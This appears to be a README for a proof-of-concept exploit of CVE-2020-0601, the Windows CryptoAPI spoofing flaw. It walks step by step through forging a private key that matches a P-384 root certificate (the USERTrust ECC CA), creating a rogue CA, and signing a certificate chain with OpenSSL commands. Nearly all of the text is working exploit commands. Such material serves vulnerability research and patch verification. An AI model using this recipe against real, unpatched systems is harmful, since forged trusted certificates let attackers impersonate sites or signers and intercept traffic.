CVE-2020-0601: Windows CryptoAPI Spoofing Vulnerability exploitation. More information in our blog post.
pip install -U -r requirements.txt
The certificate generation works with OpenSSL verion up to 1.0.2u.
We used the USERTrust ECC Certification Authority but it can be any root certificate working on P-384 curve.
To generate a private key which match the public key from the root certificate we used the script gen-key.py (works with Python 3.6 and above):
$ ./gen-key.py RootCert.pem
The key can be displayed with:
$ openssl ec -in p384-key-rogue.pem -text
Then to generate the rogue CA:
$ openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -config ca.cnf -days 500
Then we generate the following private key and certificate:
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem
openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr
openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf
Finally to have the complete chain in a single file we concatenate the CA and the server certificates:
cat client-cert.pem ca-rogue.pem > cert.pem